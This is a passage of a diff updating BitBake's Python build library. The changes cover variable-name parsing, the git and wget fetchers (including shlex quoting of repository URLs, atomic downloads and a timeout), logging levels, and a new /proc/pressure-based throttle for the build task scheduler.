691 cachename = var 699 cachename = var
692 else: 700 else:
@@ -814,6 +822,7 @@ class DataSmart(MutableMapping):
814 return value 822 return value
815 823
816 def delVarFlag(self, var, flag, **loginfo): 824 def delVarFlag(self, var, flag, **loginfo):
825 var = var.replace(":", "_")
817 self.expand_cache = {} 826 self.expand_cache = {}
818 827
819 local_var, _ = self._findVar(var) 828 local_var, _ = self._findVar(var)
@@ -831,6 +840,7 @@ class DataSmart(MutableMapping):
831 del self.dict[var][flag] 840 del self.dict[var][flag]
832 841
833 def appendVarFlag(self, var, flag, value, **loginfo): 842 def appendVarFlag(self, var, flag, value, **loginfo):
843 var = var.replace(":", "_")
834 loginfo['op'] = 'append' 844 loginfo['op'] = 'append'
835 loginfo['flag'] = flag 845 loginfo['flag'] = flag
836 self.varhistory.record(**loginfo) 846 self.varhistory.record(**loginfo)
@@ -838,6 +848,7 @@ class DataSmart(MutableMapping):
838 self.setVarFlag(var, flag, newvalue, ignore=True) 848 self.setVarFlag(var, flag, newvalue, ignore=True)
839 849
840 def prependVarFlag(self, var, flag, value, **loginfo): 850 def prependVarFlag(self, var, flag, value, **loginfo):
851 var = var.replace(":", "_")
841 loginfo['op'] = 'prepend' 852 loginfo['op'] = 'prepend'
842 loginfo['flag'] = flag 853 loginfo['flag'] = flag
843 self.varhistory.record(**loginfo) 854 self.varhistory.record(**loginfo)
@@ -845,6 +856,7 @@ class DataSmart(MutableMapping):
845 self.setVarFlag(var, flag, newvalue, ignore=True) 856 self.setVarFlag(var, flag, newvalue, ignore=True)
846 857
847 def setVarFlags(self, var, flags, **loginfo): 858 def setVarFlags(self, var, flags, **loginfo):
859 var = var.replace(":", "_")
848 self.expand_cache = {} 860 self.expand_cache = {}
849 infer_caller_details(loginfo) 861 infer_caller_details(loginfo)
850 if not var in self.dict: 862 if not var in self.dict:
@@ -859,6 +871,7 @@ class DataSmart(MutableMapping):
859 self.dict[var][i] = flags[i] 871 self.dict[var][i] = flags[i]
860 872
861 def getVarFlags(self, var, expand = False, internalflags=False): 873 def getVarFlags(self, var, expand = False, internalflags=False):
874 var = var.replace(":", "_")
862 local_var, _ = self._findVar(var) 875 local_var, _ = self._findVar(var)
863 flags = {} 876 flags = {}
864 877
@@ -875,6 +888,7 @@ class DataSmart(MutableMapping):
875 888
876 889
877 def delVarFlags(self, var, **loginfo): 890 def delVarFlags(self, var, **loginfo):
891 var = var.replace(":", "_")
878 self.expand_cache = {} 892 self.expand_cache = {}
879 if not var in self.dict: 893 if not var in self.dict:
880 self._makeShadowCopy(var) 894 self._makeShadowCopy(var)
diff --git a/bitbake/lib/bb/event.py b/bitbake/lib/bb/event.py
index d1359f0100..cb0b3b3345 100644
--- a/bitbake/lib/bb/event.py
+++ b/bitbake/lib/bb/event.py
@@ -10,17 +10,17 @@ BitBake build tools.
10# SPDX-License-Identifier: GPL-2.0-only 10# SPDX-License-Identifier: GPL-2.0-only
11# 11#
12 12
13import sys
14import pickle
15import logging
16import atexit
17import traceback
18import ast 13import ast
14import atexit
15import collections
16import logging
17import pickle
18import sys
19import threading 19import threading
20import traceback
20 21
21import bb.utils
22import bb.compat
23import bb.exceptions 22import bb.exceptions
23import bb.utils
24 24
25# This is the pid for which we should generate the event. This is set when 25# This is the pid for which we should generate the event. This is set when
26# the runqueue forks off. 26# the runqueue forks off.
@@ -56,7 +56,7 @@ def set_class_handlers(h):
56 _handlers = h 56 _handlers = h
57 57
58def clean_class_handlers(): 58def clean_class_handlers():
59 return bb.compat.OrderedDict() 59 return collections.OrderedDict()
60 60
61# Internal 61# Internal
62_handlers = clean_class_handlers() 62_handlers = clean_class_handlers()
diff --git a/bitbake/lib/bb/fetch2/__init__.py b/bitbake/lib/bb/fetch2/__init__.py
index dc99914cd9..3e6555bd67 100644
--- a/bitbake/lib/bb/fetch2/__init__.py
+++ b/bitbake/lib/bb/fetch2/__init__.py
@@ -562,6 +562,9 @@ def verify_checksum(ud, d, precomputed={}):
562 562
563 checksum_expected = getattr(ud, "%s_expected" % checksum_id) 563 checksum_expected = getattr(ud, "%s_expected" % checksum_id)
564 564
565 if checksum_expected == '':
566 checksum_expected = None
567
565 return { 568 return {
566 "id": checksum_id, 569 "id": checksum_id,
567 "name": checksum_name, 570 "name": checksum_name,
@@ -612,7 +615,7 @@ def verify_checksum(ud, d, precomputed={}):
612 615
613 for ci in checksum_infos: 616 for ci in checksum_infos:
614 if ci["expected"] and ci["expected"] != ci["data"]: 617 if ci["expected"] and ci["expected"] != ci["data"]:
615 messages.append("File: '%s' has %s checksum %s when %s was " \ 618 messages.append("File: '%s' has %s checksum '%s' when '%s' was " \
616 "expected" % (ud.localpath, ci["id"], ci["data"], ci["expected"])) 619 "expected" % (ud.localpath, ci["id"], ci["data"], ci["expected"]))
617 bad_checksum = ci["data"] 620 bad_checksum = ci["data"]
618 621
diff --git a/bitbake/lib/bb/fetch2/git.py b/bitbake/lib/bb/fetch2/git.py
index 8740e9c05f..cad1ae8207 100644
--- a/bitbake/lib/bb/fetch2/git.py
+++ b/bitbake/lib/bb/fetch2/git.py
@@ -44,7 +44,8 @@ Supported SRC_URI options are:
44 44
45- nobranch 45- nobranch
46 Don't check the SHA validation for branch. set this option for the recipe 46 Don't check the SHA validation for branch. set this option for the recipe
47 referring to commit which is valid in tag instead of branch. 47 referring to commit which is valid in any namespace (branch, tag, ...)
48 instead of branch.
48 The default is "0", set nobranch=1 if needed. 49 The default is "0", set nobranch=1 if needed.
49 50
50- usehead 51- usehead
@@ -63,10 +64,12 @@ import errno
63import fnmatch 64import fnmatch
64import os 65import os
65import re 66import re
67import shlex
66import subprocess 68import subprocess
67import tempfile 69import tempfile
68import bb 70import bb
69import bb.progress 71import bb.progress
72from contextlib import contextmanager
70from bb.fetch2 import FetchMethod 73from bb.fetch2 import FetchMethod
71from bb.fetch2 import runfetchcmd 74from bb.fetch2 import runfetchcmd
72from bb.fetch2 import logger 75from bb.fetch2 import logger
@@ -140,6 +143,10 @@ class Git(FetchMethod):
140 ud.proto = 'file' 143 ud.proto = 'file'
141 else: 144 else:
142 ud.proto = "git" 145 ud.proto = "git"
146 if ud.host == "github.com" and ud.proto == "git":
147 # github stopped supporting git protocol
148 # https://github.blog/2021-09-01-improving-git-protocol-security-github/#no-more-unauthenticated-git
149 ud.proto = "https"
143 150
144 if not ud.proto in ('git', 'file', 'ssh', 'http', 'https', 'rsync'): 151 if not ud.proto in ('git', 'file', 'ssh', 'http', 'https', 'rsync'):
145 raise bb.fetch2.ParameterError("Invalid protocol type", ud.url) 152 raise bb.fetch2.ParameterError("Invalid protocol type", ud.url)
@@ -219,7 +226,12 @@ class Git(FetchMethod):
219 ud.shallow = False 226 ud.shallow = False
220 227
221 if ud.usehead: 228 if ud.usehead:
222 ud.unresolvedrev['default'] = 'HEAD' 229 # When usehead is set let's associate 'HEAD' with the unresolved
230 # rev of this repository. This will get resolved into a revision
231 # later. If an actual revision happens to have also been provided
232 # then this setting will be overridden.
233 for name in ud.names:
234 ud.unresolvedrev[name] = 'HEAD'
223 235
224 ud.basecmd = d.getVar("FETCHCMD_git") or "git -c core.fsyncobjectfiles=0" 236 ud.basecmd = d.getVar("FETCHCMD_git") or "git -c core.fsyncobjectfiles=0"
225 237
@@ -342,7 +354,7 @@ class Git(FetchMethod):
342 # We do this since git will use a "-l" option automatically for local urls where possible 354 # We do this since git will use a "-l" option automatically for local urls where possible
343 if repourl.startswith("file://"): 355 if repourl.startswith("file://"):
344 repourl = repourl[7:] 356 repourl = repourl[7:]
345 clone_cmd = "LANG=C %s clone --bare --mirror \"%s\" %s --progress" % (ud.basecmd, repourl, ud.clonedir) 357 clone_cmd = "LANG=C %s clone --bare --mirror %s %s --progress" % (ud.basecmd, shlex.quote(repourl), ud.clonedir)
346 if ud.proto.lower() != 'file': 358 if ud.proto.lower() != 'file':
347 bb.fetch2.check_network_access(d, clone_cmd, ud.url) 359 bb.fetch2.check_network_access(d, clone_cmd, ud.url)
348 progresshandler = GitProgressHandler(d) 360 progresshandler = GitProgressHandler(d)
@@ -354,8 +366,12 @@ class Git(FetchMethod):
354 if "origin" in output: 366 if "origin" in output:
355 runfetchcmd("%s remote rm origin" % ud.basecmd, d, workdir=ud.clonedir) 367 runfetchcmd("%s remote rm origin" % ud.basecmd, d, workdir=ud.clonedir)
356 368
357 runfetchcmd("%s remote add --mirror=fetch origin \"%s\"" % (ud.basecmd, repourl), d, workdir=ud.clonedir) 369 runfetchcmd("%s remote add --mirror=fetch origin %s" % (ud.basecmd, shlex.quote(repourl)), d, workdir=ud.clonedir)
358 fetch_cmd = "LANG=C %s fetch -f --progress \"%s\" refs/*:refs/*" % (ud.basecmd, repourl) 370
371 if ud.nobranch:
372 fetch_cmd = "LANG=C %s fetch -f --progress %s refs/*:refs/*" % (ud.basecmd, shlex.quote(repourl))
373 else:
374 fetch_cmd = "LANG=C %s fetch -f --progress %s refs/heads/*:refs/heads/* refs/tags/*:refs/tags/*" % (ud.basecmd, shlex.quote(repourl))
359 if ud.proto.lower() != 'file': 375 if ud.proto.lower() != 'file':
360 bb.fetch2.check_network_access(d, fetch_cmd, ud.url) 376 bb.fetch2.check_network_access(d, fetch_cmd, ud.url)
361 progresshandler = GitProgressHandler(d) 377 progresshandler = GitProgressHandler(d)
@@ -388,7 +404,7 @@ class Git(FetchMethod):
388 tmpdir = tempfile.mkdtemp(dir=d.getVar('DL_DIR')) 404 tmpdir = tempfile.mkdtemp(dir=d.getVar('DL_DIR'))
389 try: 405 try:
390 # Do the checkout. This implicitly involves a Git LFS fetch. 406 # Do the checkout. This implicitly involves a Git LFS fetch.
391 self.unpack(ud, tmpdir, d) 407 Git.unpack(self, ud, tmpdir, d)
392 408
393 # Scoop up a copy of any stuff that Git LFS downloaded. Merge them into 409 # Scoop up a copy of any stuff that Git LFS downloaded. Merge them into
394 # the bare clonedir. 410 # the bare clonedir.
@@ -408,6 +424,20 @@ class Git(FetchMethod):
408 bb.utils.remove(tmpdir, recurse=True) 424 bb.utils.remove(tmpdir, recurse=True)
409 425
410 def build_mirror_data(self, ud, d): 426 def build_mirror_data(self, ud, d):
427
428 # Create as a temp file and move atomically into position to avoid races
429 @contextmanager
430 def create_atomic(filename):
431 fd, tfile = tempfile.mkstemp(dir=os.path.dirname(filename))
432 try:
433 yield tfile
434 umask = os.umask(0o666)
435 os.umask(umask)
436 os.chmod(tfile, (0o666 & ~umask))
437 os.rename(tfile, filename)
438 finally:
439 os.close(fd)
440
411 if ud.shallow and ud.write_shallow_tarballs: 441 if ud.shallow and ud.write_shallow_tarballs:
412 if not os.path.exists(ud.fullshallow): 442 if not os.path.exists(ud.fullshallow):
413 if os.path.islink(ud.fullshallow): 443 if os.path.islink(ud.fullshallow):
@@ -418,7 +448,8 @@ class Git(FetchMethod):
418 self.clone_shallow_local(ud, shallowclone, d) 448 self.clone_shallow_local(ud, shallowclone, d)
419 449
420 logger.info("Creating tarball of git repository") 450 logger.info("Creating tarball of git repository")
421 runfetchcmd("tar -czf %s ." % ud.fullshallow, d, workdir=shallowclone) 451 with create_atomic(ud.fullshallow) as tfile:
452 runfetchcmd("tar -czf %s ." % tfile, d, workdir=shallowclone)
422 runfetchcmd("touch %s.done" % ud.fullshallow, d) 453 runfetchcmd("touch %s.done" % ud.fullshallow, d)
423 finally: 454 finally:
424 bb.utils.remove(tempdir, recurse=True) 455 bb.utils.remove(tempdir, recurse=True)
@@ -427,7 +458,8 @@ class Git(FetchMethod):
427 os.unlink(ud.fullmirror) 458 os.unlink(ud.fullmirror)
428 459
429 logger.info("Creating tarball of git repository") 460 logger.info("Creating tarball of git repository")
430 runfetchcmd("tar -czf %s ." % ud.fullmirror, d, workdir=ud.clonedir) 461 with create_atomic(ud.fullmirror) as tfile:
462 runfetchcmd("tar -czf %s ." % tfile, d, workdir=ud.clonedir)
431 runfetchcmd("touch %s.done" % ud.fullmirror, d) 463 runfetchcmd("touch %s.done" % ud.fullmirror, d)
432 464
433 def clone_shallow_local(self, ud, dest, d): 465 def clone_shallow_local(self, ud, dest, d):
@@ -533,7 +565,7 @@ class Git(FetchMethod):
533 raise bb.fetch2.UnpackError("No up to date source found: " + "; ".join(source_error), ud.url) 565 raise bb.fetch2.UnpackError("No up to date source found: " + "; ".join(source_error), ud.url)
534 566
535 repourl = self._get_repo_url(ud) 567 repourl = self._get_repo_url(ud)
536 runfetchcmd("%s remote set-url origin \"%s\"" % (ud.basecmd, repourl), d, workdir=destdir) 568 runfetchcmd("%s remote set-url origin %s" % (ud.basecmd, shlex.quote(repourl)), d, workdir=destdir)
537 569
538 if self._contains_lfs(ud, d, destdir): 570 if self._contains_lfs(ud, d, destdir):
539 if need_lfs and not self._find_git_lfs(d): 571 if need_lfs and not self._find_git_lfs(d):
@@ -661,8 +693,8 @@ class Git(FetchMethod):
661 d.setVar('_BB_GIT_IN_LSREMOTE', '1') 693 d.setVar('_BB_GIT_IN_LSREMOTE', '1')
662 try: 694 try:
663 repourl = self._get_repo_url(ud) 695 repourl = self._get_repo_url(ud)
664 cmd = "%s ls-remote \"%s\" %s" % \ 696 cmd = "%s ls-remote %s %s" % \
665 (ud.basecmd, repourl, search) 697 (ud.basecmd, shlex.quote(repourl), search)
666 if ud.proto.lower() != 'file': 698 if ud.proto.lower() != 'file':
667 bb.fetch2.check_network_access(d, cmd, repourl) 699 bb.fetch2.check_network_access(d, cmd, repourl)
668 output = runfetchcmd(cmd, d, True) 700 output = runfetchcmd(cmd, d, True)
diff --git a/bitbake/lib/bb/fetch2/wget.py b/bitbake/lib/bb/fetch2/wget.py
index f7d1de26b7..368c644337 100644
--- a/bitbake/lib/bb/fetch2/wget.py
+++ b/bitbake/lib/bb/fetch2/wget.py
@@ -52,6 +52,12 @@ class WgetProgressHandler(bb.progress.LineFilterProgressHandler):
52 52
53 53
54class Wget(FetchMethod): 54class Wget(FetchMethod):
55
56 # CDNs like CloudFlare may do a 'browser integrity test' which can fail
57 # with the standard wget/urllib User-Agent, so pretend to be a modern
58 # browser.
59 user_agent = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0"
60
55 """Class to fetch urls via 'wget'""" 61 """Class to fetch urls via 'wget'"""
56 def supports(self, ud, d): 62 def supports(self, ud, d):
57 """ 63 """
@@ -91,10 +97,9 @@ class Wget(FetchMethod):
91 97
92 fetchcmd = self.basecmd 98 fetchcmd = self.basecmd
93 99
94 if 'downloadfilename' in ud.parm: 100 localpath = os.path.join(d.getVar("DL_DIR"), ud.localfile) + ".tmp"
95 localpath = os.path.join(d.getVar("DL_DIR"), ud.localfile) 101 bb.utils.mkdirhier(os.path.dirname(localpath))
96 bb.utils.mkdirhier(os.path.dirname(localpath)) 102 fetchcmd += " -O %s" % shlex.quote(localpath)
97 fetchcmd += " -O %s" % shlex.quote(localpath)
98 103
99 if ud.user and ud.pswd: 104 if ud.user and ud.pswd:
100 fetchcmd += " --user=%s --password=%s --auth-no-challenge" % (ud.user, ud.pswd) 105 fetchcmd += " --user=%s --password=%s --auth-no-challenge" % (ud.user, ud.pswd)
@@ -108,6 +113,10 @@ class Wget(FetchMethod):
108 113
109 self._runwget(ud, d, fetchcmd, False) 114 self._runwget(ud, d, fetchcmd, False)
110 115
116 # Remove the ".tmp" and move the file into position atomically
117 # Our lock prevents multiple writers but mirroring code may grab incomplete files
118 os.rename(localpath, localpath[:-4])
119
111 # Sanity check since wget can pretend it succeed when it didn't 120 # Sanity check since wget can pretend it succeed when it didn't
112 # Also, this used to happen if sourceforge sent us to the mirror page 121 # Also, this used to happen if sourceforge sent us to the mirror page
113 if not os.path.exists(ud.localpath): 122 if not os.path.exists(ud.localpath):
@@ -300,7 +309,7 @@ class Wget(FetchMethod):
300 # Some servers (FusionForge, as used on Alioth) require that the 309 # Some servers (FusionForge, as used on Alioth) require that the
301 # optional Accept header is set. 310 # optional Accept header is set.
302 r.add_header("Accept", "*/*") 311 r.add_header("Accept", "*/*")
303 r.add_header("User-Agent", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/9.10 (karmic) Firefox/3.6.12") 312 r.add_header("User-Agent", self.user_agent)
304 def add_basic_auth(login_str, request): 313 def add_basic_auth(login_str, request):
305 '''Adds Basic auth to http request, pass in login:password as string''' 314 '''Adds Basic auth to http request, pass in login:password as string'''
306 import base64 315 import base64
@@ -319,7 +328,7 @@ class Wget(FetchMethod):
319 except (TypeError, ImportError, IOError, netrc.NetrcParseError): 328 except (TypeError, ImportError, IOError, netrc.NetrcParseError):
320 pass 329 pass
321 330
322 with opener.open(r) as response: 331 with opener.open(r, timeout=30) as response:
323 pass 332 pass
324 except urllib.error.URLError as e: 333 except urllib.error.URLError as e:
325 if try_again: 334 if try_again:
@@ -404,9 +413,8 @@ class Wget(FetchMethod):
404 """ 413 """
405 f = tempfile.NamedTemporaryFile() 414 f = tempfile.NamedTemporaryFile()
406 with tempfile.TemporaryDirectory(prefix="wget-index-") as workdir, tempfile.NamedTemporaryFile(dir=workdir, prefix="wget-listing-") as f: 415 with tempfile.TemporaryDirectory(prefix="wget-index-") as workdir, tempfile.NamedTemporaryFile(dir=workdir, prefix="wget-listing-") as f:
407 agent = "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/9.10 (karmic) Firefox/3.6.12"
408 fetchcmd = self.basecmd 416 fetchcmd = self.basecmd
409 fetchcmd += " -O " + f.name + " --user-agent='" + agent + "' '" + uri + "'" 417 fetchcmd += " -O " + f.name + " --user-agent='" + self.user_agent + "' '" + uri + "'"
410 try: 418 try:
411 self._runwget(ud, d, fetchcmd, True, workdir=workdir) 419 self._runwget(ud, d, fetchcmd, True, workdir=workdir)
412 fetchresult = f.read() 420 fetchresult = f.read()
diff --git a/bitbake/lib/bb/monitordisk.py b/bitbake/lib/bb/monitordisk.py
index e7c07264a8..4d243af30b 100644
--- a/bitbake/lib/bb/monitordisk.py
+++ b/bitbake/lib/bb/monitordisk.py
@@ -229,9 +229,10 @@ class diskMonitor:
229 freeInode = st.f_favail 229 freeInode = st.f_favail
230 230
231 if minInode and freeInode < minInode: 231 if minInode and freeInode < minInode:
232 # Some filesystems use dynamic inodes so can't run out 232 # Some filesystems use dynamic inodes so can't run out.
233 # (e.g. btrfs). This is reported by the inode count being 0. 233 # This is reported by the inode count being 0 (btrfs) or the free
234 if st.f_files == 0: 234 # inode count being -1 (cephfs).
235 if st.f_files == 0 or st.f_favail == -1:
235 self.devDict[k][2] = None 236 self.devDict[k][2] = None
236 continue 237 continue
237 # Always show warning, the self.checked would always be False if the action is WARN 238 # Always show warning, the self.checked would always be False if the action is WARN
diff --git a/bitbake/lib/bb/msg.py b/bitbake/lib/bb/msg.py
index 2d88c4e72d..1b1a23bb50 100644
--- a/bitbake/lib/bb/msg.py
+++ b/bitbake/lib/bb/msg.py
@@ -146,18 +146,12 @@ class LogFilterLTLevel(logging.Filter):
146# 146#
147 147
148loggerDefaultLogLevel = BBLogFormatter.NOTE 148loggerDefaultLogLevel = BBLogFormatter.NOTE
149loggerDefaultVerbose = False
150loggerVerboseLogs = False
151loggerDefaultDomains = {} 149loggerDefaultDomains = {}
152 150
153def init_msgconfig(verbose, debug, debug_domains=None): 151def init_msgconfig(verbose, debug, debug_domains=None):
154 """ 152 """
155 Set default verbosity and debug levels config the logger 153 Set default verbosity and debug levels config the logger
156 """ 154 """
157 bb.msg.loggerDefaultVerbose = verbose
158 if verbose:
159 bb.msg.loggerVerboseLogs = True
160
161 if debug: 155 if debug:
162 bb.msg.loggerDefaultLogLevel = BBLogFormatter.DEBUG - debug + 1 156 bb.msg.loggerDefaultLogLevel = BBLogFormatter.DEBUG - debug + 1
163 elif verbose: 157 elif verbose:
diff --git a/bitbake/lib/bb/parse/ast.py b/bitbake/lib/bb/parse/ast.py
index eb8cfa21b8..9f46f3f35a 100644
--- a/bitbake/lib/bb/parse/ast.py
+++ b/bitbake/lib/bb/parse/ast.py
@@ -97,6 +97,7 @@ class DataNode(AstNode):
97 def eval(self, data): 97 def eval(self, data):
98 groupd = self.groupd 98 groupd = self.groupd
99 key = groupd["var"] 99 key = groupd["var"]
100 key = key.replace(":", "_")
100 loginfo = { 101 loginfo = {
101 'variable': key, 102 'variable': key,
102 'file': self.filename, 103 'file': self.filename,
@@ -207,6 +208,7 @@ class ExportFuncsNode(AstNode):
207 def eval(self, data): 208 def eval(self, data):
208 209
209 for func in self.n: 210 for func in self.n:
211 func = func.replace(":", "_")
210 calledfunc = self.classname + "_" + func 212 calledfunc = self.classname + "_" + func
211 213
212 if data.getVar(func, False) and not data.getVarFlag(func, 'export_func', False): 214 if data.getVar(func, False) and not data.getVarFlag(func, 'export_func', False):
diff --git a/bitbake/lib/bb/parse/parse_py/BBHandler.py b/bitbake/lib/bb/parse/parse_py/BBHandler.py
index 6e216effb8..8781129fc1 100644
--- a/bitbake/lib/bb/parse/parse_py/BBHandler.py
+++ b/bitbake/lib/bb/parse/parse_py/BBHandler.py
@@ -22,7 +22,7 @@ from .ConfHandler import include, init
22# For compatibility 22# For compatibility
23bb.deprecate_import(__name__, "bb.parse", ["vars_from_file"]) 23bb.deprecate_import(__name__, "bb.parse", ["vars_from_file"])
24 24
25__func_start_regexp__ = re.compile(r"(((?P<py>python)|(?P<fr>fakeroot))\s*)*(?P<func>[\w\.\-\+\{\}\$]+)?\s*\(\s*\)\s*{$" ) 25__func_start_regexp__ = re.compile(r"(((?P<py>python(?=(\s|\()))|(?P<fr>fakeroot(?=\s)))\s*)*(?P<func>[\w\.\-\+\{\}\$:]+)?\s*\(\s*\)\s*{$" )
26__inherit_regexp__ = re.compile(r"inherit\s+(.+)" ) 26__inherit_regexp__ = re.compile(r"inherit\s+(.+)" )
27__export_func_regexp__ = re.compile(r"EXPORT_FUNCTIONS\s+(.+)" ) 27__export_func_regexp__ = re.compile(r"EXPORT_FUNCTIONS\s+(.+)" )
28__addtask_regexp__ = re.compile(r"addtask\s+(?P<func>\w+)\s*((before\s*(?P<before>((.*(?=after))|(.*))))|(after\s*(?P<after>((.*(?=before))|(.*)))))*") 28__addtask_regexp__ = re.compile(r"addtask\s+(?P<func>\w+)\s*((before\s*(?P<before>((.*(?=after))|(.*))))|(after\s*(?P<after>((.*(?=before))|(.*)))))*")
diff --git a/bitbake/lib/bb/parse/parse_py/ConfHandler.py b/bitbake/lib/bb/parse/parse_py/ConfHandler.py
index af64d3446e..a7e81bd6ad 100644
--- a/bitbake/lib/bb/parse/parse_py/ConfHandler.py
+++ b/bitbake/lib/bb/parse/parse_py/ConfHandler.py
@@ -20,7 +20,7 @@ from bb.parse import ParseError, resolve_file, ast, logger, handle
20__config_regexp__ = re.compile( r""" 20__config_regexp__ = re.compile( r"""
21 ^ 21 ^
22 (?P<exp>export\s+)? 22 (?P<exp>export\s+)?
23 (?P<var>[a-zA-Z0-9\-_+.${}/~]+?) 23 (?P<var>[a-zA-Z0-9\-_+.${}/~:]+?)
24 (\[(?P<flag>[a-zA-Z0-9\-_+.]+)\])? 24 (\[(?P<flag>[a-zA-Z0-9\-_+.]+)\])?
25 25
26 \s* ( 26 \s* (
diff --git a/bitbake/lib/bb/persist_data.py b/bitbake/lib/bb/persist_data.py
index 7357ab2d44..56c983f816 100644
--- a/bitbake/lib/bb/persist_data.py
+++ b/bitbake/lib/bb/persist_data.py
@@ -12,14 +12,15 @@ currently, providing a key/value store accessed by 'domain'.
12# 12#
13 13
14import collections 14import collections
15import collections.abc
16import contextlib
17import functools
15import logging 18import logging
16import os.path 19import os.path
20import sqlite3
17import sys 21import sys
18import warnings 22import warnings
19from bb.compat import total_ordering 23from collections.abc import Mapping
20from collections import Mapping
21import sqlite3
22import contextlib
23 24
24sqlversion = sqlite3.sqlite_version_info 25sqlversion = sqlite3.sqlite_version_info
25if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3): 26if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3):
@@ -28,8 +29,8 @@ if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3):
28 29
29logger = logging.getLogger("BitBake.PersistData") 30logger = logging.getLogger("BitBake.PersistData")
30 31
31@total_ordering 32@functools.total_ordering
32class SQLTable(collections.MutableMapping): 33class SQLTable(collections.abc.MutableMapping):
33 class _Decorators(object): 34 class _Decorators(object):
34 @staticmethod 35 @staticmethod
35 def retry(*, reconnect=True): 36 def retry(*, reconnect=True):
diff --git a/bitbake/lib/bb/process.py b/bitbake/lib/bb/process.py
index 2dc472a86f..24c588e533 100644
--- a/bitbake/lib/bb/process.py
+++ b/bitbake/lib/bb/process.py
@@ -179,5 +179,8 @@ def run(cmd, input=None, log=None, extrafiles=None, **options):
179 stderr = stderr.decode("utf-8") 179 stderr = stderr.decode("utf-8")
180 180
181 if pipe.returncode != 0: 181 if pipe.returncode != 0:
182 if log:
183 # Don't duplicate the output in the exception if logging it
184 raise ExecutionError(cmd, pipe.returncode, None, None)
182 raise ExecutionError(cmd, pipe.returncode, stdout, stderr) 185 raise ExecutionError(cmd, pipe.returncode, stdout, stderr)
183 return stdout, stderr 186 return stdout, stderr
diff --git a/bitbake/lib/bb/providers.py b/bitbake/lib/bb/providers.py
index 81459c36d5..484e1ea4f3 100644
--- a/bitbake/lib/bb/providers.py
+++ b/bitbake/lib/bb/providers.py
@@ -151,7 +151,7 @@ def findPreferredProvider(pn, cfgData, dataCache, pkg_pn = None, item = None):
151 if item: 151 if item:
152 itemstr = " (for item %s)" % item 152 itemstr = " (for item %s)" % item
153 if preferred_file is None: 153 if preferred_file is None:
154 logger.info("preferred version %s of %s not available%s", pv_str, pn, itemstr) 154 logger.warning("preferred version %s of %s not available%s", pv_str, pn, itemstr)
155 available_vers = [] 155 available_vers = []
156 for file_set in pkg_pn: 156 for file_set in pkg_pn:
157 for f in file_set: 157 for f in file_set:
@@ -163,7 +163,7 @@ def findPreferredProvider(pn, cfgData, dataCache, pkg_pn = None, item = None):
163 available_vers.append(ver_str) 163 available_vers.append(ver_str)
164 if available_vers: 164 if available_vers:
165 available_vers.sort() 165 available_vers.sort()
166 logger.info("versions of %s available: %s", pn, ' '.join(available_vers)) 166 logger.warning("versions of %s available: %s", pn, ' '.join(available_vers))
167 else: 167 else:
168 logger.debug(1, "selecting %s as PREFERRED_VERSION %s of package %s%s", preferred_file, pv_str, pn, itemstr) 168 logger.debug(1, "selecting %s as PREFERRED_VERSION %s of package %s%s", preferred_file, pv_str, pn, itemstr)
169 169
diff --git a/bitbake/lib/bb/runqueue.py b/bitbake/lib/bb/runqueue.py
index 30cab5379e..886eef1f27 100644
--- a/bitbake/lib/bb/runqueue.py
+++ b/bitbake/lib/bb/runqueue.py
@@ -24,6 +24,7 @@ import pickle
24from multiprocessing import Process 24from multiprocessing import Process
25import shlex 25import shlex
26import pprint 26import pprint
27import time
27 28
28bblogger = logging.getLogger("BitBake") 29bblogger = logging.getLogger("BitBake")
29logger = logging.getLogger("BitBake.RunQueue") 30logger = logging.getLogger("BitBake.RunQueue")
@@ -142,6 +143,55 @@ class RunQueueScheduler(object):
142 self.buildable.append(tid) 143 self.buildable.append(tid)
143 144
144 self.rev_prio_map = None 145 self.rev_prio_map = None
146 self.is_pressure_usable()
147
148 def is_pressure_usable(self):
149 """
150 If monitoring pressure, return True if pressure files can be open and read. For example
151 openSUSE /proc/pressure/* files have readable file permissions but when read the error EOPNOTSUPP (Operation not supported)
152 is returned.
153 """
154 if self.rq.max_cpu_pressure or self.rq.max_io_pressure or self.rq.max_memory_pressure:
155 try:
156 with open("/proc/pressure/cpu") as cpu_pressure_fds, \
157 open("/proc/pressure/io") as io_pressure_fds, \
158 open("/proc/pressure/memory") as memory_pressure_fds:
159
160 self.prev_cpu_pressure = cpu_pressure_fds.readline().split()[4].split("=")[1]
161 self.prev_io_pressure = io_pressure_fds.readline().split()[4].split("=")[1]
162 self.prev_memory_pressure = memory_pressure_fds.readline().split()[4].split("=")[1]
163 self.prev_pressure_time = time.time()
164 self.check_pressure = True
165 except:
166 bb.note("The /proc/pressure files can't be read. Continuing build without monitoring pressure")
167 self.check_pressure = False
168 else:
169 self.check_pressure = False
170
171 def exceeds_max_pressure(self):
172 """
173 Monitor the difference in total pressure at least once per second, if
174 BB_PRESSURE_MAX_{CPU|IO|MEMORY} are set, return True if above threshold.
175 """
176 if self.check_pressure:
177 with open("/proc/pressure/cpu") as cpu_pressure_fds, \
178 open("/proc/pressure/io") as io_pressure_fds, \
179 open("/proc/pressure/memory") as memory_pressure_fds:
180 # extract "total" from /proc/pressure/{cpu|io}
181 curr_cpu_pressure = cpu_pressure_fds.readline().split()[4].split("=")[1]
182 curr_io_pressure = io_pressure_fds.readline().split()[4].split("=")[1]
183 curr_memory_pressure = memory_pressure_fds.readline().split()[4].split("=")[1]
184 exceeds_cpu_pressure = self.rq.max_cpu_pressure and (float(curr_cpu_pressure) - float(self.prev_cpu_pressure)) > self.rq.max_cpu_pressure
185 exceeds_io_pressure = self.rq.max_io_pressure and (float(curr_io_pressure) - float(self.prev_io_pressure)) > self.rq.max_io_pressure
186 exceeds_memory_pressure = self.rq.max_memory_pressure and (float(curr_memory_pressure) - float(self.prev_memory_pressure)) > self.rq.max_memory_pressure
187 now = time.time()
188 if now - self.prev_pressure_time > 1.0:
189 self.prev_cpu_pressure = curr_cpu_pressure
190 self.prev_io_pressure = curr_io_pressure
191 self.prev_memory_pressure = curr_memory_pressure
192 self.prev_pressure_time = now
193 return (exceeds_cpu_pressure or exceeds_io_pressure or exceeds_memory_pressure)
194 return False
145 195
146 def next_buildable_task(self): 196 def next_buildable_task(self):
147 """ 197 """
